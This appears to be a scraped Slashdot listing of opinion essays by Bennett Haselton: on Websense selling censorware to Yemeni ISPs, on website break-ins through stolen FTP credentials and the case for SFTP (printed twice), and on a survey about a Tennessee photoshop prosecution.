    There are only about 200,000 Internet users in Yemen, compared to over six million in Saudi Arabia, millions more in other censored Middle Eastern countries, and 300 million in Internet-censored China. (And even the Yemenis' Internet access is not filtered all the time, since the ONI report says that the number of concurrent licenses for Websense purchased by the Yemeni ISPs is less than the number of Yemeni Internet users, and when the number of concurrent users exceeds the number of licenses, all requests go through unfiltered!) So it would be a small step towards global liberation of the Internet, but still equivalent to de-censoring Internet access for every resident of Boise if the city had 100% broadband penetration, which is enough to justify putting the squeeze on Websense.

    What exactly would happen if Websense did revoke their license for the Yemeni ISPs? They couldn't force the ISPs to uninstall the software, but they could stop allowing them to download further updates to the Websense blocked-site list. Most installations of Websense are configured to download updates to the list every day, to block the latest adult websites as well as to try and stay ahead of newly released proxy sites. Once the list updates stopped, all existing blocked websites would remain blocked, but newly created adult sites and proxy sites would be accessible, and the filtering would gradually become less and less effective. So it would be a concrete victory for Yemeni Internet users, and not just a symbolic gesture.

    How would we know if Websense went through with it, anyway, if they refuse to confirm or deny that they have revoked the licenses for Yemen? The ONI declined to tell me how exactly they determined that Yemeni ISPs were using Websense. (Not that I mind; they could have obtained this information with the help of people whose jobs and freedom would be at stake if they were found out, in which case ONI would not be able to share their confidential sources.) Presumably the ONI could repeat their research in the future to determine if Websense were still being used. However, even if they can see that Websense software is still being used to censor the Internet, it may not be easy to tell whether the Yemeni ISPs are still downloading updates to the blocked-site list. My suggestion: Create a new proxy site and don't publicize it anywhere, but report it to Websense for blocking. Test a few days later to verify that it's blocked by Websense, but not by Smartfilter or other popular blocking programs. Then see if it's blocked in Yemen as well. If not, then hopefully that means that Websense cut them off.

    And then what? Maybe the Yemeni ISPs will just continue using Websense with a frozen copy of the blocked site list, reasoning that most of the well-known adult sites that users are going to try to visit, are probably already on that list. Maybe they'll set up a shell company in another country, posing as an ISP requesting a legitimate copy of Websense, and buy a new list subscription that way. But it will still be worth it to press Websense into revoking their license, even if it only breaks Internet censorship in Yemen for a few months or a year. At that point, perhaps they'll just take their business to Smartfilter like almost every other Middle Eastern country that censors the Internet.

    After all, we shouldn't pick on Websense too much, when Smartfilter is censoring national Internet access for about 100 times that many users in total. If Websense says they don't provide software to government censors, then we should hold them to that. But the real scandal isn't that American censorware companies provide filters to censoring governments while claiming not to, it's that American companies are doing it at all.

  25. R.I.P. FTP

    Features · · posted by CmdrTaco · from the and-good-riddance-to-ye dept. · 359 comments
    Slashdot contributor Bennett Haselton says "Using FTP to administer a website is insecure -- but not for the reasons that you probably think. You yourself can stop using FTP any time you want, but how do we change the landscape Net-wide, to reduce the number of breakins using stolen FTP credentials?" You know what to click on if you want to read the rest.

    On July 1st I found that one of my less important websites, hosted on a low-cost shared Web hosting service, had been broken into. A friend emailed me to say that the site was showing up in Google's search results with the Google "This site may harm your computer" warning listed next to it. I found that on one of the pages, about 1,500 HTML script tags had been inserted, loading JavaScript files from pseudo-random Russian hostnames like "www.chk06.ru" and "www.errghr.ru", none of which are currently resolving. Usually, when such script tags are maliciously inserted into a page on a website, the script tags attempt to install spyware on the machines of people who visit the site.

    I immediately replaced the infected file on the website with the backed-up clean copy from my machine, and changed the password on the website in case the attacker had gotten in by using the old one. (The original file with the script tags inserted is here if you want to examine it, but use with caution -- if the .ru hostnames in the script tags start resolving again, then opening the file could cause the JavaScript on the pages to be loaded, which might infect your machine.) Then I started investigating (a) how this probably happened; (b) whether future similar attacks could be prevented, by changing some defaults in the way that hosting accounts are set up; and (c) whether the incentives for hosting providers are such that these changes are likely to happen by themselves, or whether it will require some third-party advocacy to change what we think of as "best practices".

    Denis Sinegubko, the webmaster of Unmask Parasites, a free service that scans websites on demand for signs of break-ins, says:

    The majority of web site compromises happen because of:

    1. Stolen FTP credentials. Spyware on webmasters' computers: key-loggers, traffic sniffers (FTP protocol sends username/password as plain text), trojans that steal credentials from various programs' configuration files (FTP clients, DreamWeaver, etc).
    2. Security holes in popular web software: CMS (Joomla, Drupal, etc), Forums (phpBB, vBulletin, Simple Machines, etc), Blogs (WordPress). Once a vulnerability discovered, hackers configure their automated tools to search the web for websites running vulnerable versions of the software and exploit them. This can be done easily and at almost no cost when they have an army of zombie computers.
    3. Security hole in "in-house" web software. Many novice (and even many experienced) web developers don't properly sanitize user input making various attacks possible (SQL injections, XSS, etc)
    4. Poor security practices (Something that should be manually configured by site/server admins and cannot be fixed with automated security updates): Weak passwords, open ports, insufficiently strict permissions for limited accounts, files and directories with world write permissions, etc.

    I didn't have any third-party web software or custom-made software installed on the PublicEditorMyAss.com site, the password was a seven-letter meaningless mix of letters and numbers, and I didn't have permission to change most of the things like open ports and file permissions. That left the possibility of stolen FTP credentials. This is in fact what Sinegubko says is the most common cause of such break-ins:

    I guess 90% of attacks use stolen FTP credentials this year. Check this Google's graph that shows the top 10 malware sites as counted by the number of compromised web sites that referenced it:
    http://googleonlinesecurity.blogspot.com/2009/06/top-10-malware-sites.html

    I reviewed 4 most widespread of them (Gumblar, Martuz, Goooogleadsense, Googleanalytlcs). All four used stolen FTP credential to penetrate web sites and upload malicious content. The chances are the rest used this vector too.

    When the PublicEditorMyAss.com site was set up, the default setting was for pages to be edited over FTP. Even though FTP sends and receives passwords without encrypting them (in contrast with alternatives like SFTP or "secure FTP", which encrypts passwords), for a long time I had assumed that this was not a major security problem, because in order for an attacker to intercept the passwords in transit, they would have to control a machine somewhere on the path between my home computer and the PublicEditorMyAss.com server. I figured this wasn't worth worrying about, because it was much more likely that an attacker would attempt to steal the password by installing spyware on my home computer. And if an attacker managed to do that, then I assumed that the risk of passwords being stolen by spyware was about the same whether I used FTP or SFTP -- because either way, the spyware could just steal my password by reading it out of a configuration file where the password was stored. (Even though FTP and SFTP programs both store passwords in an encrypted format, the programs have to be able to decrypt the passwords in order to use them whenever the user wants to open a connection. So the spyware could just mimic whatever steps the client programs use to decrypt the stored passwords, in order to steal one of my passwords stored in a file.) So, I assumed it made no difference whether I used FTP or SFTP.

    But according to what Sinegubko told me, this reasoning was probably wrong. The problem is that even though spyware installed on your machine could read passwords that are stored in configuration files, it would be a lot of work to write a spyware program that could do this, because every FTP program and SFTP program stores passwords according to a different algorithm. It's much simpler for spyware to simply watch the traffic sent and received from your machine, so that any unencrypted passwords will be spotted:

    [Passwords can be stolen by] sniffers that read all TCP traffic on local computers. Like personal firewalls but malicious. They can easily intercept FTP credentials since they are sent as a plain text.

    Sinegubko describes how one of his contacts obtained evidence that a common spyware program was doing exactly this:

    One of them even infected a spare WinXP computer (with Gumblar) to test the consequences. On the infected computer he created a new account in a popular FTP client and saved it. The server address was correct (his server) and the username/password pair was not valid. A few hours later in FTP logs, he discovered login attempts that used that invalid username/password pair from a Singapore IP, then from a Florida IP, the some other country's IP. Apparently the FTP credentials were somehow stolen from that infected computer.

    I know of only two instances where I've ever definitely been infected with spyware. I don't do stupid things like downloading and running strange programs from third-party sites, so I think both infections were probably caused by a site exploiting a security hole in Internet Explorer, or in a plug-in like Adobe Acrobat or the Flash player. Both times, once I noticed I was infected, I got rid of the infection with Malwarebytes, but I don't know how much damage the spyware did in the meantime.

    So this was a case where a little knowledge can be a dangerous thing. If I had known nothing about Internet architecture, and someone told me "FTP is less secure than SFTP," I would have found a way to switch to administering the site via SFTP. But because I knew that the main reason FTP was considered "insecure" was because it transmitted passwords unencrypted, but I also knew that most of of the machines relaying those passwords in transit were secure and trustworthy, I thought it didn't matter. Now it seems that is probably how my password got compromised after all.

    In that case, why don't more people switch to administering their sites via SFTP instead of FTP? Here are the steps it took me to enable SFTP on my GoDaddy hosting account. Feel free to use this as a reference, but the obvious point is that as long as this many steps are required, it's safe to say that most users won't be switching:

    1. Go to the "Hosting" menu and pick "My Hosting Account."
    2. Next to the name of your website, pick "Manage Account." This will open the Hosting Control Center.
    3. In Hosting Control Center, click to expand the "Settings" options.
    4. In the "Settings" control panel, click the "SSH" icon.
    5. You will see a page saying "SSH is not set up", and prompting you to enter a phone number so that their automated service can call you with a PIN number. After you enter your phone number, the phone rings a second later, and you enter the PIN in a form on the GoDaddy website.
    6. You will then see a page which says:

      Current Hosting Account Status: Pending Account Change
      Your request to enable SSH is being processed. This upgrade may take up to 24 hours.

    In fact, even if only one step were required to switch, most users probably wouldn't change from the default setting to use FTP, due to the eternal, unchangeable fact that most people do not change their default settings, ever. (What percent of users ever change the default set of toolbars that are displayed at the top of their Web browser window?)

    If more Web hosting companies made SFTP the default, then the number of websites that were compromised by stolen login credentials, would probably go down. Spyware authors might start to make their programs smarter at that point, enabling them to read the passwords stored by popular FTP and SFTP programs, so that it would make no difference whether the passwords were transmitted in the clear or not. However, this would be harder for spyware authors to do correctly, so it would at least raise the bar for a successful malware attack, and the number of compromised websites would be reduced.

    Unfortunately, Web hosting companies don't have much incentive to make users switch to the more secure SFTP protocol. This isn't necessarily true of all security risks; sometimes the hosting company has a strong incentive to pass on the right wisdom (and select the right default settings) for their customers. From the hosting company's point of view, you could divide risks into three categories:

    • Risks where the hosting company pays a large part of the price for a customer's machine being compromised. For example, if a cyber-criminal takes over a customer's machine and uses it to launch a denial-of-service attack by sending it a flood of traffic, the hosting company will see that traffic spike on their network. The hosting company has the most incentive to help prevent these types of attacks.

    • Risks where the hosting company doesn't directly pay a price for the customer's machine being compromised, but they may have to deal with complaints sent in by third parties. For example, a customer's website could get broken into, and script tags could be inserted into the pages that cause visitors' machines to be infected with spyware. Those visitors might complain to the webmaster of the infected site, or they might complain to the hosting company, which then forwards the complaint to the webmaster. The hosting company may have to provide a few minutes of tech support to the customer, advising them to change their password and scan their own machine for spyware, but they probably won't incur any other material costs.

    • Risks where neither the hosting company nor the customer pays a price for the machine being infected, but the price is paid by "Internet users as a whole." The only attack that I can think of in this category, is an attack where a cyber-criminal inserts key words into your web page and links them to his site, in order to increase his Google ranking for searches for those key words. Neither the website owner, nor any visitors to the website, are victimized directly; the harm being done is that the quality of Google search results is reduced for everybody. The only reports of the attack would probably come from "good Samaritan" Web surfers, who tell the hosting company or the webmaster that one of their pages has been vandalized.

    When a customer's FTP credentials are stolen, the price paid by the hosting company lies somewhere in the middle. An attacker who stole my current PublicEditorMyAss.com credentials would only be able to deface the content on the site, but they wouldn't be able to launch an attack against a third-party network (my PublicEditorMyAss.com hosting account doesn't have the ability to initiate an outgoing connection to a third-party site).

    Weighing in the other direction are the costs of switching to SFTP. If existing customers are forcibly switched over, phone lines will be clogged by customers wanting to know why their old method of logging in to their site has suddenly stopped working. A better choice would be to allow existing customers to stay with FTP while making SFTP the default for new customers. But there is a time and money cost of changing anything, even a default setting.

    So GoDaddy doesn't have much incentive to make SFTP their new default. Indeed, I've used many different shared hosting companies before I started running proxies exclusively on dedicated servers, and none of the shared hosting companies ever used anything but FTP as the default method for customers to administer their websites. So who can blame them? They're not making the choice that makes the most sense for their customers or for Internet security as a whole, they're making the choice that makes the most sense in terms of costs and benefits for themselves, and I'm not being judgmental about that. We shouldn't expect most companies to ever behave in any other way.

    That's why I think that glib "solutions" to security problems, like "Everybody install anti-virus software", or "Everybody stop using Windows", aren't helpful, because regardless of whether these ideas would work if everybody actually followed them, the fact is that most people won't. The problems have to be addressed in terms of changing incentives for the choices people make.

    What's an idea for reducing the risks of FTP credentials stolen by malware, that addresses the incentives problem? Maybe give tax breaks to Web hosting companies that set up customer accounts to use SFTP instead of FTP by default? Or ask more computer vendors to include a desktop link to pre-installed SFTP software, so that when Web hosting companies present options to their customers, it's easier for users to choose the SFTP option since they have a client already installed? (I was tempted to recommend that Microsoft include a universal SFTP client pre-installed in Windows with a prominent desktop link, but the problem with that is that if almost everybody used the same SFTP client, malware authors would have greater incentive to reverse-engineer the algorithm that the client used to store saved passwords -- and then passwords would be just as easily accessible to spyware, as if the user were using FTP all along. So a good mix of SFTP clients is safer for this purpose.)

    Since the difference between SFTP and FTP usually only matters in cases where a customer's machine has been infected with malware, obviously the best solution is to avoid malware altogether, but that's much harder problem to solve, as long as malware authors can keep finding security holes in Internet Explorer and other popular programs. Making SFTP the new standard for Web hosting accounts is something that we know how to do, right now. The incentives aren't currently right for Web hosting companies to make it happen. But there may be ways to change that, and I'll bet some people can think of better ideas than the ones I've suggested. I'm just saying that the incentives problem is where attention should be focused.

  26. R.I.P. FTP

    Features · · posted by CmdrTaco · from the and-good-riddance-to-ye dept. · 359 comments
    Slashdot contributor Bennett Haselton says "Using FTP to administer a website is insecure -- but not for the reasons that you probably think. You yourself can stop using FTP any time you want, but how do we change the landscape Net-wide, to reduce the number of breakins using stolen FTP credentials?" You know what to click on if you want to read the rest.

    On July 1st I found that one of my less important websites, hosted on a low-cost shared Web hosting service, had been broken into. A friend emailed me to say that the site was showing up in Google's search results with the Google "This site may harm your computer" warning listed next to it. I found that on one of the pages, about 1,500 HTML script tags had been inserted, loading JavaScript files from pseudo-random Russian hostnames like "www.chk06.ru" and "www.errghr.ru", none of which are currently resolving. Usually, when such script tags are maliciously inserted into a page on a website, the script tags attempt to install spyware on the machines of people who visit the site.

    I immediately replaced the infected file on the website with the backed-up clean copy from my machine, and changed the password on the website in case the attacker had gotten in by using the old one. (The original file with the script tags inserted is here if you want to examine it, but use with caution -- if the .ru hostnames in the script tags start resolving again, then opening the file could cause the JavaScript on the pages to be loaded, which might infect your machine.) Then I started investigating (a) how this probably happened; (b) whether future similar attacks could be prevented, by changing some defaults in the way that hosting accounts are set up; and (c) whether the incentives for hosting providers are such that these changes are likely to happen by themselves, or whether it will require some third-party advocacy to change what we think of as "best practices".

    Denis Sinegubko, the webmaster of Unmask Parasites, a free service that scans websites on demand for signs of break-ins, says:

    The majority of web site compromises happen because of:

    1. Stolen FTP credentials. Spyware on webmasters' computers: key-loggers, traffic sniffers (FTP protocol sends username/password as plain text), trojans that steal credentials from various programs' configuration files (FTP clients, DreamWeaver, etc).
    2. Security holes in popular web software: CMS (Joomla, Drupal, etc), Forums (phpBB, vBulletin, Simple Machines, etc), Blogs (WordPress). Once a vulnerability discovered, hackers configure their automated tools to search the web for websites running vulnerable versions of the software and exploit them. This can be done easily and at almost no cost when they have an army of zombie computers.
    3. Security hole in "in-house" web software. Many novice (and even many experienced) web developers don't properly sanitize user input making various attacks possible (SQL injections, XSS, etc)
    4. Poor security practices (Something that should be manually configured by site/server admins and cannot be fixed with automated security updates): Weak passwords, open ports, insufficiently strict permissions for limited accounts, files and directories with world write permissions, etc.

    I didn't have any third-party web software or custom-made software installed on the PublicEditorMyAss.com site, the password was a seven-letter meaningless mix of letters and numbers, and I didn't have permission to change most of the things like open ports and file permissions. That left the possibility of stolen FTP credentials. This is in fact what Sinegubko says is the most common cause of such break-ins:

    I guess 90% of attacks use stolen FTP credentials this year. Check this Google's graph that shows the top 10 malware sites as counted by the number of compromised web sites that referenced it:
    http://googleonlinesecurity.blogspot.com/2009/06/top-10-malware-sites.html

    I reviewed 4 most widespread of them (Gumblar, Martuz, Goooogleadsense, Googleanalytlcs). All four used stolen FTP credential to penetrate web sites and upload malicious content. The chances are the rest used this vector too.

    When the PublicEditorMyAss.com site was set up, the default setting was for pages to be edited over FTP. Even though FTP sends and receives passwords without encrypting them (in contrast with alternatives like SFTP or "secure FTP", which encrypts passwords), for a long time I had assumed that this was not a major security problem, because in order for an attacker to intercept the passwords in transit, they would have to control a machine somewhere on the path between my home computer and the PublicEditorMyAss.com server. I figured this wasn't worth worrying about, because it was much more likely that an attacker would attempt to steal the password by installing spyware on my home computer. And if an attacker managed to do that, then I assumed that the risk of passwords being stolen by spyware was about the same whether I used FTP or SFTP -- because either way, the spyware could just steal my password by reading it out of a configuration file where the password was stored. (Even though FTP and SFTP programs both store passwords in an encrypted format, the programs have to be able to decrypt the passwords in order to use them whenever the user wants to open a connection. So the spyware could just mimic whatever steps the client programs use to decrypt the stored passwords, in order to steal one of my passwords stored in a file.) So, I assumed it made no difference whether I used FTP or SFTP.

    But according to what Sinegubko told me, this reasoning was probably wrong. The problem is that even though spyware installed on your machine could read passwords that are stored in configuration files, it would be a lot of work to write a spyware program that could do this, because every FTP program and SFTP program stores passwords according to a different algorithm. It's much simpler for spyware to simply watch the traffic sent and received from your machine, so that any unencrypted passwords will be spotted:

    [Passwords can be stolen by] sniffers that read all TCP traffic on local computers. Like personal firewalls but malicious. They can easily intercept FTP credentials since they are sent as a plain text.

    Sinegubko describes how one of his contacts obtained evidence that a common spyware program was doing exactly this:

    One of them even infected a spare WinXP computer (with Gumblar) to test the consequences. On the infected computer he created a new account in a popular FTP client and saved it. The server address was correct (his server) and the username/password pair was not valid. A few hours later in FTP logs, he discovered login attempts that used that invalid username/password pair from a Singapore IP, then from a Florida IP, the some other country's IP. Apparently the FTP credentials were somehow stolen from that infected computer.

    I know of only two instances where I've ever definitely been infected with spyware. I don't do stupid things like downloading and running strange programs from third-party sites, so I think both infections were probably caused by a site exploiting a security hole in Internet Explorer, or in a plug-in like Adobe Acrobat or the Flash player. Both times, once I noticed I was infected, I got rid of the infection with Malwarebytes, but I don't know how much damage the spyware did in the meantime.

    So this was a case where a little knowledge can be a dangerous thing. If I had known nothing about Internet architecture, and someone told me "FTP is less secure than SFTP," I would have found a way to switch to administering the site via SFTP. But because I knew that the main reason FTP was considered "insecure" was because it transmitted passwords unencrypted, but I also knew that most of of the machines relaying those passwords in transit were secure and trustworthy, I thought it didn't matter. Now it seems that is probably how my password got compromised after all.

    In that case, why don't more people switch to administering their sites via SFTP instead of FTP? Here are the steps it took me to enable SFTP on my GoDaddy hosting account. Feel free to use this as a reference, but the obvious point is that as long as this many steps are required, it's safe to say that most users won't be switching:

    1. Go to the "Hosting" menu and pick "My Hosting Account."
    2. Next to the name of your website, pick "Manage Account." This will open the Hosting Control Center.
    3. In Hosting Control Center, click to expand the "Settings" options.
    4. In the "Settings" control panel, click the "SSH" icon.
    5. You will see a page saying "SSH is not set up", and prompting you to enter a phone number so that their automated service can call you with a PIN number. After you enter your phone number, the phone rings a second later, and you enter the PIN in a form on the GoDaddy website.
    6. You will then see a page which says:

      Current Hosting Account Status: Pending Account Change
      Your request to enable SSH is being processed. This upgrade may take up to 24 hours.

    In fact, even if only one step were required to switch, most users probably wouldn't change from the default setting to use FTP, due to the eternal, unchangeable fact that most people do not change their default settings, ever. (What percent of users ever change the default set of toolbars that are displayed at the top of their Web browser window?)

    If more Web hosting companies made SFTP the default, then the number of websites that were compromised by stolen login credentials, would probably go down. Spyware authors might start to make their programs smarter at that point, enabling them to read the passwords stored by popular FTP and SFTP programs, so that it would make no difference whether the passwords were transmitted in the clear or not. However, this would be harder for spyware authors to do correctly, so it would at least raise the bar for a successful malware attack, and the number of compromised websites would be reduced.

    Unfortunately, Web hosting companies don't have much incentive to make users switch to the more secure SFTP protocol. This isn't necessarily true of all security risks; sometimes the hosting company has a strong incentive to pass on the right wisdom (and select the right default settings) for their customers. From the hosting company's point of view, you could divide risks into three categories:

    • Risks where the hosting company pays a large part of the price for a customer's machine being compromised. For example, if a cyber-criminal takes over a customer's machine and uses it to launch a denial-of-service attack by sending it a flood of traffic, the hosting company will see that traffic spike on their network. The hosting company has the most incentive to help prevent these types of attacks.

    • Risks where the hosting company doesn't directly pay a price for the customer's machine being compromised, but they may have to deal with complaints sent in by third parties. For example, a customer's website could get broken into, and script tags could be inserted into the pages that cause visitors' machines to be infected with spyware. Those visitors might complain to the webmaster of the infected site, or they might complain to the hosting company, which then forwards the complaint to the webmaster. The hosting company may have to provide a few minutes of tech support to the customer, advising them to change their password and scan their own machine for spyware, but they probably won't incur any other material costs.

    • Risks where neither the hosting company nor the customer pays a price for the machine being infected, but the price is paid by "Internet users as a whole." The only attack that I can think of in this category, is an attack where a cyber-criminal inserts key words into your web page and links them to his site, in order to increase his Google ranking for searches for those key words. Neither the website owner, nor any visitors to the website, are victimized directly; the harm being done is that the quality of Google search results is reduced for everybody. The only reports of the attack would probably come from "good Samaritan" Web surfers, who tell the hosting company or the webmaster that one of their pages has been vandalized.

    When a customer's FTP credentials are stolen, the price paid by the hosting company lies somewhere in the middle. An attacker who stole my current PublicEditorMyAss.com credentials would only be able to deface the content on the site, but they wouldn't be able to launch an attack against a third-party network (my PublicEditorMyAss.com hosting account doesn't have the ability to initiate an outgoing connection to a third-party site).

    Weighing in the other direction are the costs of switching to SFTP. If existing customers are forcibly switched over, phone lines will be clogged by customers wanting to know why their old method of logging in to their site has suddenly stopped working. A better choice would be to allow existing customers to stay with FTP while making SFTP the default for new customers. But there is a time and money cost of changing anything, even a default setting.

    So GoDaddy doesn't have much incentive to make SFTP their new default. Indeed, I've used many different shared hosting companies before I started running proxies exclusively on dedicated servers, and none of the shared hosting companies ever used anything but FTP as the default method for customers to administer their websites. So who can blame them? They're not making the choice that makes the most sense for their customers or for Internet security as a whole, they're making the choice that makes the most sense in terms of costs and benefits for themselves, and I'm not being judgmental about that. We shouldn't expect most companies to ever behave in any other way.

    That's why I think that glib "solutions" to security problems, like "Everybody install anti-virus software", or "Everybody stop using Windows", aren't helpful, because regardless of whether these ideas would work if everybody actually followed them, the fact is that most people won't. The problems have to be addressed in terms of changing incentives for the choices people make.

    What's an idea for reducing the risks of FTP credentials stolen by malware, that addresses the incentives problem? Maybe give tax breaks to Web hosting companies that set up customer accounts to use SFTP instead of FTP by default? Or ask more computer vendors to include a desktop link to pre-installed SFTP software, so that when Web hosting companies present options to their customers, it's easier for users to choose the SFTP option since they have a client already installed? (I was tempted to recommend that Microsoft include a universal SFTP client pre-installed in Windows with a prominent desktop link, but the problem with that is that if almost everybody used the same SFTP client, malware authors would have greater incentive to reverse-engineer the algorithm that the client used to store saved passwords -- and then passwords would be just as easily accessible to spyware, as if the user were using FTP all along. So a good mix of SFTP clients is safer for this purpose.)

    Since the difference between SFTP and FTP usually only matters in cases where a customer's machine has been infected with malware, obviously the best solution is to avoid malware altogether, but that's much harder problem to solve, as long as malware authors can keep finding security holes in Internet Explorer and other popular programs. Making SFTP the new standard for Web hosting accounts is something that we know how to do, right now. The incentives aren't currently right for Web hosting companies to make it happen. But there may be ways to change that, and I'll bet some people can think of better ideas than the ones I've suggested. I'm just saying that the incentives problem is where attention should be focused.

  27. The Mathletes and the Miley Photoshop

    Features · · posted by CmdrTaco · from the look-what-i-can-do dept. · 555 comments
    Frequent Slashdot contributor Bennett Haselton's essay this week is about "A Tennessee man is arrested for possessing a picture of Miley Cyrus's face superimposed on a nude woman's body. In a survey that I posted on the Web, a majority of respondents said the man violated the law -- except for respondents who say they were good at math in school, who as a group answered the survey differently from everyone else." Continue on to see how.

    On June 24, a Tennessee man was arrested for possessing photos that showed the faces of three underage girls, including Miley Cyrus, superimposed onto the nude bodies of adult women. Assistant District Attorney Dave Denny said of the arrest, "When you have the face of a small child affixed to a nude body of a mature woman, it's going to be the state's position that this is for sexual gratification and that this is simulated sexual activity." The phrase "simulated sexual activity" apparently refers to a Tennessee sex crimes law which states in part: "It is unlawful for any person to knowingly possess material that includes a minor engaged in simulated sexual activity that is patently offensive."

    Assuming this is the crime that the D.A. plans to charge him with, to me it seems obvious that the defendant didn't violate the law as written. For one thing, if the nude women in the pictures were just standing there (and neither the article nor the D.A.'s statement suggests otherwise), then there was no "sexual activity" in the photos of any kind, real or simulated. But even if the nude adult women in the photos had been engaged in sexual activity (even just striking a mildly sexy pose), the law still would not apply, because the law requires an actual minor to actually be engaged in something, even if that "something" is simulated sexual activity. So if a video showed a real minor that appeared to be masturbating or having sex with someone in a manner that was "patently offensive", that could violate the law. (Hopefully the "patently offensive" clause would exclude artistic movies like The Tin Drum, although that defense has not always worked.) But if the girls' faces were simply cut and pasted onto the bodies of the women in the photos, then the minors in question were not "engaged in" anything. The D.A. appears to have confused "material that includes a minor engaged in simulated sexual activity" with "material that simulates a minor engaged in sexual activity". And the D.A.'s statement that "this is for sexual gratification and that this is simulated sexual activity" — clearly implying that the pictures are for sexual gratification and therefore this is "simulated sexual activity" — is ridiculous. The defendant probably used pictures of Miley with her clothes on for "sexual gratification" — does that make the photos "simulated sexual activity"? (Dave Denny's office did not respond to my request for comment.)

    But I was more interested in a different question: What would people in a survey think about whether the defendant violated the law? And, would people who are good at math, answer the question differently from everyone else? And would those people answer the question differently from people who are good at, say, English composition?

    That might seem like an odd twist to put on it. But if you can show that a certain answer correlates with mathematical ability, that indicates something special about that answer. And if you can show that that answer appeals to people with math skills, but not to people with English/writing/composition skills, then that indicates something interesting not just about that answer, but about mathematical ability as well, as opposed to writing ability. Whether that answer is "right" or "wrong" (or whether you think those terms are even meaningful for a legal opinion), it is a fact, not an opinion, that people with self-reported higher math skills are more likely to pick that as the correct choice.

    By contrast, when the D.A. makes a public statement about the criminality of the defendant's actions, the implication is that we should give some weight to his statements because of his qualifications, such as being a member of the bar. But if we were to ask other bar members to decide independently of each other whether the defendant committed a crime, would they converge on the same answer? If not, then why should we listen to him, as opposed to someone else with the same credentials? When an expert cites their credentials in support of an opinion, if it's not true that other experts with the same credentials would back them up on that opinion, I don't think people realize the extent to which there is no there there.

    So in the survey, I described the man's alleged actions and the Tennessee statute, and asked people if they thought he had violated the law. I also asked respondents to rate their math skills as "Excellent"/"Very good"/"Good"/"Fair"/"Poor" and to rate their English/composition skills as "Excellent"/"Very good"/"Good"/"Fair"/"Poor". The survey was posted on the Amazon Mechanical Turk site, where you can post "tasks" for people to complete in exchange for small payments of, say, 25 cents apiece. Some companies use this for grunt work (like hiring people to review user-submitted profile photos to make sure they don't contain nudity), but I use the site mainly to conduct surveys.

    I think it's unlikely that the Mechanical Turk users are a representative cross-section of the population, but I use it more to find significant relative differences between demographic groups. If 60% of women on the site answer a question one way and 80% of men answer it the other way, that probably suggests that in a real cross-sectional survey of the population, men and women would largely disagree on the answer as well. (The alternative would be that the kind of men and women who use Mechanical Turk are predisposed to answer the question differently along gender lines in a way that average men and women are not, but that seems unlikely.)

    For this survey, I offered users 25 cents apiece for completing this survey and collected 127 responses. The results in a nutshell:

    1. About two-thirds of all respondents (85 out of 127) said that the man did violate the law.
    2. However, among the respondents who rated their own math skills as "Excellent", only 44% (12 out of 27) said he violated the law, and 56% (15 out of 27) said that he did not. Out of all ten ability groupings (five different ability groupings for math, from "Excellent" to "Poor", and five for English), this was the only group where a majority said that the defendant didn't violate the statute.
    3. Respondents who self-rated their English/composition skills as "Excellent", were also more likely than average to vote that the man did not violate the law, but a majority of them still voted that he did.

    These results are significant at the 99% level, which you can check using an online statistical significance calculator. In other words, despite the modest sample size, the answers given by the respondents with self-rated "excellent" math skills are so starkly different from everyone else's, that there's less than a 1 in 100 chance that the difference is due to coincidence. Almost certainly, something about mathematical ability is correlated with a person's likelihood of giving the "not guilty" answer. (At this point I'm going to give in to my bias and hereinafter refer to that as the "right answer.")

    Furthermore, while respondents with "excellent" English/composition skills were also more likely than average to get the right answer (a difference that is also significant at the 99% level, given the collected data), they were considerably less likely to do so, than the users with self-reported "excellent" math skills (again, significant at the 99% level). I tabulated all the responses.

    If I could afford to pay a larger sample, I would investigate whether the effect of "excellent" English/composition skills disappears entirely when you control for math skills. In other words, it's possible that the people with excellent English/composition skills were more likely than average to get the right answer, but only insofar as their English/composition skills were correlated with excellent math ability — and maybe people with "excellent" English/composition skills, but only average math ability, score no better than the average respondents.

    One thing that jumps out at me: Even though 44% of the 27 people with "excellent" math skills said the man did violate the law, when you look at the 58 people who self-reported "very good" math skills, 74% of them said he violated the law. This would appear to confound my original hypothesis that good math skills lead people to converge on the correct answer. But I suspect that many people with self-reported "very good" math grades were probably just good students who studied hard and did the practice problems and got good grades in math, but without necessarily having the insight that makes someone an "excellent" math student. Without that insight, there was no reason to expect them to be better than average at answering a question that has no resemblance to their textbook's practice problems.

    In fact, I suspect that many of the people who self-reported their math skills as "excellent", and who still answered "yes" to the question of whether the man violated the law, probably fell into that studious-but-not-insightful category as well. It would be interesting to test whether if you required respondents to actually answer a math question — not a standard textbook question, but a tricky question that required people to demonstrate an understanding of what is actually going on — if the correlation between correctly answering that question, and "correctly" answering the legal question, is even stronger.

    But what I think is even more important than the correlation of the correct answer with "excellent" math ability, was the significantly lower correlation of the correct answer with "excellent" English skills. I've been saying for years that you can use excellent prose to defend an illogical idea, or you can use poorly crafted prose to defend a good idea, and so if you care about the quality of an idea and its impact on the real world, you have to look at the substance of an argument, not the style. Economics professor Steven Landsburg writes in his forthcoming philosophy book The Big Questions,

    The bane of a college professor's existence is the student who has been taught in a writing course that there is such a thing as good writing, independent of having something to say. Students turn in well-organized grammatically correct prose, with the occasional stylistic flourish in lieu of any logical argument, and don't understand why they've earned grades of zero.

    I call such people "vocabulemics", who seem to think the purpose of a discussion is to vomit up as many SAT vocab prep words as possible, rather than to form a coherent point. I've tried, and I can't think of any coherent point that could be made in order to argue that the Miley photoshopper really did violate the Tennessee law.

    If you're still unconvinced by the results of a survey of mathletes, consider that they do match up well with the comments provided to me by Mark Rasch, a lawyer and computer security specialist with Secure IT Experts and the former head of the Department of Justice Computer Crimes Unit:

    First, an image of a minor engaged in simulated sexual activity is not the same as a simulated minor engaged in sexual activity... In other words, if you posed actual minors, nude, and made it look like they were having sex, it would be a crime, even though there was no "actual" sexual activity. In most other contexts, when the legislature says "simulated sexual activity" they mean real people engaged in what appears to be sex. The government is trying to apply this theory to real sex but simulated minors. I don't think that passes statutory muster.. its not what the statute prohibits... Under that rationale, if you had, for example, a picture of two dogs mating, and glued pictures of kids on the dogs faces, this would be "simulated sexual activity" but would not be prosecutable. Where do you draw the line? Under federal law, you typically draw the line at the use and posing of real kids.

    Depending on how you look at it, you may think that this opinion from credentialed expert Mr. Rasch, vindicates the opinion of the math aficionados who voted that the defendant did not violate the law. I think it's the other way around — the fact that this answer was correlated in the survey responses with mathematical ability, vindicates the opinion of Mr. Rasch.

  28. The Mathletes and the Miley Photoshop

    Features · · posted by CmdrTaco · from the look-what-i-can-do dept. · 555 comments
